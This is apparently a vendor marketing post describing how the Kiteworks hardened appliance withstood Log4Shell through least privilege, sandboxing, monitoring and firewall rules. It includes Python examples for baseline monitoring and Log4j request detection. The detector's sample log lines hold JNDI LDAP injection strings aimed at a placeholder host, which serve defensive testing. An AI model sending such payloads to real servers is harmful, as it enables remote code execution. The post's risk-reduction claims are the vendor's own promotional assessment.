Beating Log4Shell: How the Kiteworks Hardened Appliance Lived Up to Its Name
If you ask a random security professional or CISO whether they remember what they did on December 9, 2021, there’s a very good chance the answer will be yes. That is the day organizations around the world scrambled to urgently upgrade and update almost every critical system and piece of infrastructure they had, because of the publication of the Log4Shell vulnerability: the critical vulnerability in the popular Log4j library that allows anyone with an internet connection to remotely execute arbitrary commands on the operating systems of vulnerable products.
Kiteworks did not require an urgent patch on that day, even though it does indeed use Log4j. Thanks to Kiteworks’ multi-layered security approach in building its hardened appliance, the vulnerability’s CVSS score of 10.0 was effectively reduced to a 4.0 (at most) in Kiteworks. This gave Kiteworks customers the knowledge and assurance that their most critical and sensitive information was safe and protected.
Protection From the Inside Out
To paraphrase English poet John Donne, “no system is an island entire of itself,” and Kiteworks is no different. By its very nature, Kiteworks is a connected system, allowing its users to collaborate with colleagues (both internal and external) in a safe, secure, and compliant manner. This means that Kiteworks must connect to other systems, and allow other systems and users to connect to it. The challenge is to do so in a fully zero-trust manner, ensuring that nothing and no one gets in or out without authorization, and without being noticed.
To that end, we created the Kiteworks hardened appliance.
Minimalist Operating System
A Kiteworks hardened appliance begins its life as a bare installation of the Linux operating system, with only the absolute minimum number of libraries and system applications required for its operation. The Kiteworks DevOps team then installs a highly curated set of third-party libraries, each of them absolutely required for the operation of Kiteworks and approved by the security team.
The list of utilized libraries is continuously scanned against a database of known vulnerabilities, ensuring the Kiteworks hardened appliance is always up to date with the required security patches and upgrades.
The result is a Kiteworks hardened appliance with zero unnecessary open ports or running services.
Operating System Hardening
Operating system hardening is the practice of securing an operating system by reducing its vulnerabilities, mitigating threats, and minimizing its attack surface. The goal of hardening an operating system is to make it more secure, reliable, and resilient to cyberattacks. Common practices for operating system hardening are described below.
How Does System Hardening Reduce the Attack Surface?
System hardening is the process of securing a computer system by reducing its attack surface, that is, the total set of points an attacker can exploit to gain unauthorized access or steal sensitive information. System hardening reduces the attack surface in several ways, including:
- Disabling unnecessary services and protocols: By disabling unnecessary services and protocols, you reduce the number of entry points that a hacker can exploit to gain unauthorized access. Each service or protocol that is running on a system can potentially introduce vulnerabilities, so removing any that are not required for business operations can reduce the attack surface.
- Updating software and firmware: Keeping software and firmware up to date helps to patch known vulnerabilities or weaknesses that could be exploited by attackers. This reduces the likelihood of attackers being able to exploit known vulnerabilities in outdated software.
- Configuring access controls: Properly configuring access controls can limit the number of users who have access to sensitive data, reducing the attack surface by limiting the number of potential targets for attackers.
- Implementing strong authentication: Strong authentication mechanisms, such as multi-factor authentication, can make it more difficult for attackers to gain unauthorized access, further reducing the attack surface.
- Enforcing password policies: By implementing strong password policies, such as requiring complex passwords and regular password changes, you can reduce the likelihood of attackers gaining access through brute-force attacks.
- Removing unnecessary user accounts: By removing user accounts that are no longer needed, you reduce the number of potential targets for attackers to gain unauthorized access.
System hardening is an important part of any organization’s cybersecurity strategy. By reducing the attack surface, you can make it more difficult for attackers to gain access to sensitive data or systems, protecting your organization from potential threats.
Device Hardening vs. Hardened Security Appliances
Device hardening refers to the process of securing individual devices by removing or disabling unnecessary services, applying security patches, and implementing security controls like firewalls, encryption, and access controls. Hardened security appliances, on the other hand, are specialized devices that are designed and optimized to perform specific security tasks, such as firewalling, intrusion detection and prevention, and content filtering.
These devices come with built-in security features and are preconfigured to provide maximum protection against a range of threats. In short, while device hardening involves securing individual devices, hardened security appliances provide an additional layer of protection by providing specialized security functionalities within a network environment.
Zero Trust (Goes Both Ways)
Continuing the notion of minimal access, the internals of the Kiteworks hardened appliance can be accessed by exactly one system account. A very small number of other system accounts exist, but their permission set is extremely limited, in keeping with the principle of least privilege, and they are not allowed interactive access to the appliance.
To ensure the integrity of the Kiteworks hardened appliance, the support account can only be used by a certified Kiteworks support engineer. No customer is ever given the password to that account, not even for an appliance installed in their own on-premises data center.
However, Kiteworks also ensures that this connection can only be made with the explicit and active approval of the customer. During normal operations, only the customer administrator controls access to that account; Kiteworks does not know or have access to the account password. When a support session is required, a system administrator can generate a new encrypted access password on the fly and pass it to the support engineer, who in turn has the ability to decrypt it and use it to connect.
The outcome is full, double-sided zero trust.
Internal Monitoring
All Kiteworks hardened appliances are equipped with internal mechanisms to monitor and enforce highly strict policies regarding the expected behavior of both the operating system and the file systems. If, for any reason, a Kiteworks hardened appliance deviates from its original state (e.g., a file is unexpectedly changed or created where it should not have been, or a service starts listening on an unexpected port), an alert is automatically sent to the administrator.
The hardened appliance also maintains detailed logs of all critical service activity, allowing system administrators to monitor Kiteworks’ internal workings in real time using their own security information and event management (SIEM) and security orchestration, automation, and response (SOAR) tools.
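The deviation-from-baseline monitoring described in this section, as an added illustration rather than Kiteworks’ own mechanism: it hashes a file tree, parses a constructed /proc/net/tcp excerpt for listening sockets, and reports every file change or unexpected listener against a recorded baseline. The file names, ports, and port allowlist are constructed for the example.

```python
import hashlib, tempfile
from pathlib import Path

# Constructed /proc/net/tcp excerpt (trailing columns omitted): state "0A" is LISTEN and
# local_address is hex addr:port (01BB = 443, 0016 = 22, 1F90 = 8080); row 3 is an established connection.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st
   0: 00000000:01BB 00000000:0000 0A
   1: 00000000:0016 00000000:0000 0A
   2: 0100007F:1F90 00000000:0000 0A
   3: 0100007F:C350 0100007F:01BB 01
"""

def listening_ports(proc_net_tcp_text):
    # Decimal port numbers of every socket in LISTEN state.
    ports = set()
    for line in proc_net_tcp_text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[3] == "0A":
            ports.add(int(fields[1].rsplit(":", 1)[1], 16))
    return ports

def snapshot_files(root):
    # Relative path -> SHA-256 digest of every regular file under root.
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in Path(root).rglob("*") if p.is_file()}

def deviations(baseline, current, allowed_ports, open_ports):
    # Every difference from the recorded state becomes one alert line.
    alerts = []
    for path in sorted(set(baseline) | set(current)):
        if path not in baseline:
            alerts.append(f"unexpected new file: {path}")
        elif path not in current:
            alerts.append(f"file removed: {path}")
        elif baseline[path] != current[path]:
            alerts.append(f"file modified: {path}")
    alerts += [f"unexpected listening port: {p}" for p in sorted(open_ports - allowed_ports)]
    return alerts

def demo():
    # Baseline a tiny constructed file tree, then alter one file and drop in a new one.
    with tempfile.TemporaryDirectory() as root:
        conf = Path(root, "app.conf")
        conf.write_text("listen=443\n")
        baseline = snapshot_files(root)
        conf.write_text("listen=443\ndebug=true\n")
        Path(root, "extra.sh").write_text("#!/bin/sh\n")
        current = snapshot_files(root)
    return deviations(baseline, current, {22, 443}, listening_ports(SAMPLE_PROC_NET_TCP))
```

On a real appliance the baseline would be taken at build time and stored outside the monitored tree; each returned alert line is what would be forwarded to the administrator or SIEM.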
Internal Sandboxing
As mentioned before, the operation of Kiteworks relies, at times, on libraries provided by a third party, whether open source or commercial. Wherever possible, Kiteworks runs these libraries inside an operating system-level sandbox. In other words, although the third-party library in question is installed, its access to other parts of the operating system or file systems is significantly limited. This ensures that, even if a vulnerability is found in one of these libraries, the potential threat to the Kiteworks hardened appliance is significantly reduced.
Network Policy Enforcement
To ensure that the operating system’s original state is enforced on the network side as well, all Kiteworks hardened appliances have a very strict internal firewall configuration, allowing incoming network traffic only through the required and expected channels and ports.
Additional Network Protections
All Kiteworks hardened appliances are equipped with mechanisms to monitor and block malicious connections and web requests. On top of the static firewall configuration that blocks network connections on unexpected ports, we also utilize dynamic blocking of malicious requests. In addition, repeat offenders are automatically and completely blocked, to ensure the smooth and safe operation of the appliance and the Kiteworks solution.
Network Appliance for Network Security
A network appliance for network security is a hardware device that is designed to protect a computer network from unauthorized access, viruses, malware, and other threats. It is essentially a specialized computer that is optimized for security purposes and is placed on the network to monitor all traffic flowing through it.
Typically, a network security appliance will include a number of security features, such as firewalls, intrusion detection/prevention systems, antivirus/malware software, virtual private network (VPN) support, and content filtering. These features work together to identify and block malicious traffic, prevent attacks, and keep the network secure.
Network security appliances are used by businesses and organizations of all sizes, from small startups to large enterprises. They are particularly important for companies that handle sensitive or confidential data, such as financial institutions, medical facilities, and government agencies. By using a network security appliance, organizations can ensure that their network is protected and their data remains secure.
Network Hardening Best Practices
To ensure maximum protection, network administrators should adopt best practices such as implementing strong passwords, installing firewalls, using encryption protocols, regularly updating software, monitoring network traffic, and conducting regular security audits. It is also important to restrict access to sensitive data based on need-to-know principles and regularly train employees on cybersecurity awareness. By following these best practices, businesses can ensure their network remains secure and protected from potential threats.
Enter Log4j
Log4j is an event logging library, provided as a free-to-use, open-source solution by the Apache Software Foundation. The foundation itself is backed by many of the major brands in the world, including Google, Microsoft, Amazon, and Apple, among others. Due to its well-trusted provider, its many strengths, and its simple usage, Log4j quickly became one of the most popular libraries in the world, incorporated by most major vendors into a wide range of solutions. Kiteworks is one of those vendors.
In December of 2021, it was discovered that Log4j had a serious security vulnerability. After investigation, the National Vulnerability Database (NVD), operated by the National Institute of Standards and Technology (NIST), gave the vulnerability the highest possible CVSS score—a 10.0.
This scoring system takes many factors into consideration, revolving around how easy the vulnerability is to exploit and the extent of the potential damage. The Log4j vulnerability, nicknamed Log4Shell, in practice allowed any unauthenticated person in the world to make any vulnerable system in the world execute malicious code.
With the extreme popularity of Log4j, it is easy to see why this became a global incident overnight.
Kiteworks Hardened Appliance to the Rescue
While many vendors around the world struggled to issue emergency patches and alert their customers about the urgent need to install them, Kiteworks did not.
After a thorough investigation, the Kiteworks security team concluded that, in the context of the hardened appliance, the vulnerability’s CVSS score would be a 4 at the most. In fact, to this day, no proof exists that there is a way to exploit the vulnerability in Kiteworks. The following are some of the key takeaways:
- Following the Principle of Least Privilege, the vulnerable library was implemented and utilized in a highly restrictive configuration. This meant that the vulnerable APIs were disabled, and therefore not exploitable.
- The vulnerable library ran inside its own sandbox, meaning that it was impossible for it to run any external code, let alone malicious code. Therefore, even if it were to be exploited, the potential threat was significantly reduced.
- The vulnerable library was closely monitored, meaning that any deviation from its expected behavior would have been noticed and alerted on. It never did deviate.
Even with the above in mind, we did not want to take any chances. The following release of Kiteworks incorporated a patch and multiple mechanisms to prevent any possibility of exploitation, even though the risk was minimal to nonexistent.
These included:
- An upgrade to a non-vulnerable version of the library.
- An amended library configuration that specifically disables the vulnerable setting, so that even if the vulnerable APIs were enabled in the future, protection would remain intact.
- A special rule in our internal network protection mechanisms, blocking any direct Log4j web requests.
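The dynamic request blocking and repeat-offender banning described under Additional Network Protections, together with the rule against direct Log4j web requests, as an added illustration that is not Kiteworks’ own rule set: it URL-decodes the client-controlled fields of constructed access-log lines, flags Log4j lookup syntax, and bans a client IP once it crosses a constructed threshold. The log lines, documentation-range IPs, and threshold are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (combined log format): a normal request, a JNDI lookup
# in the User-Agent, the same lookup URL-encoded in the query string, and a non-JNDI
# lookup expression in the query string.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:03:14:09 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://example.invalid/a}"
203.0.113.9 - - [10/Dec/2021:03:14:11 +0000] "GET /login?u=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 200 88 "-" "curl/7.79"
203.0.113.12 - - [10/Dec/2021:03:14:20 +0000] "GET /search?q=${env:HOME} HTTP/1.1" 200 40 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d{3} \S+ '
                    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")   # any Log4j-style ${...} lookup expression

def normalize(value):
    # URL-decode until the value is stable (defeats double encoding), then case-fold.
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value.lower()

def classify(fields):
    # "block" for an explicit JNDI lookup anywhere in client-controlled input,
    # "suspicious" for any other lookup syntax, None for a clean request.
    text = normalize(" ".join(fields))
    if "${jndi:" in text:
        return "block"
    if LOOKUP_RE.search(text):
        return "suspicious"
    return None

def scan_log(log_text, ban_threshold=2):
    # Per-line (client, verdict) pairs plus the set of clients that reached the ban threshold.
    verdicts, blocked_hits = [], {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify([m["req"], m["ref"], m["ua"]])
        verdicts.append((m["ip"], verdict))
        if verdict == "block":
            blocked_hits[m["ip"]] = blocked_hits.get(m["ip"], 0) + 1
    banned = {ip for ip, n in blocked_hits.items() if n >= ban_threshold}
    return verdicts, banned
```

In an inline filter the same classify() decision would be taken on the live request headers and target before the application logs them; on a log feed, as here, it yields the alert and ban list a SIEM or SOAR playbook would act on.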
Find Out More About the Kiteworks Hardened Appliance
Kiteworks customers facilitate internal and external collaboration and trust us with their most sensitive and critical content. To live up to that responsibility, the Kiteworks hardened appliance is meticulously engineered with layer upon layer of security mechanisms, allowing it to withstand not only known attacks but also previously unknown ones.
To learn more about the Kiteworks hardened appliance, schedule a custom-tailored demo of the Kiteworks Private Content Network today.
Additional Resources
- Brief: Kiteworks Hardened Virtual Appliance Provides Multiple Security Layers to Dramatically Reduce Vulnerability Exploit and Impact Severity
- Blog Post: “Log4Shell” Apache Vulnerability: What Kiteworks Customers Need To Know
- Fact Sheet: Log4Shell Zero-day Vulnerability
- Report: 2023 Forecast for Managing Private Communications Exposure Risk
- Brief: Top 6 Reasons to Add Email Protection Gateway (EPG) to Your Kiteworks Deployment